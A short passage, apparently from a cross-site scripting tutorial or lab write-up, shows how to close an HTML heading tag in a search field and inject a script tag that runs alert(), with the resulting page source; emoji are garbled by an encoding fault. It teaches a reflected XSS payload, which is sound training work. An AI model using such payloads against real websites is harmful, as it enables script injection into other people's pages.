alert() function.test).
๐ป Create the Payload
We close the current HTML tag and add our JavaScript:
<h1>0 search results for 'test'</h1><script>alert("Xss Is Here")</script><!--'</h1>-->
๐ Inject the Payload
Put the payload in the search bar.
In the HTML source, it will look like this:
'</h1><script>alert("Xss Is Here")</script><!--


๐ฏ Result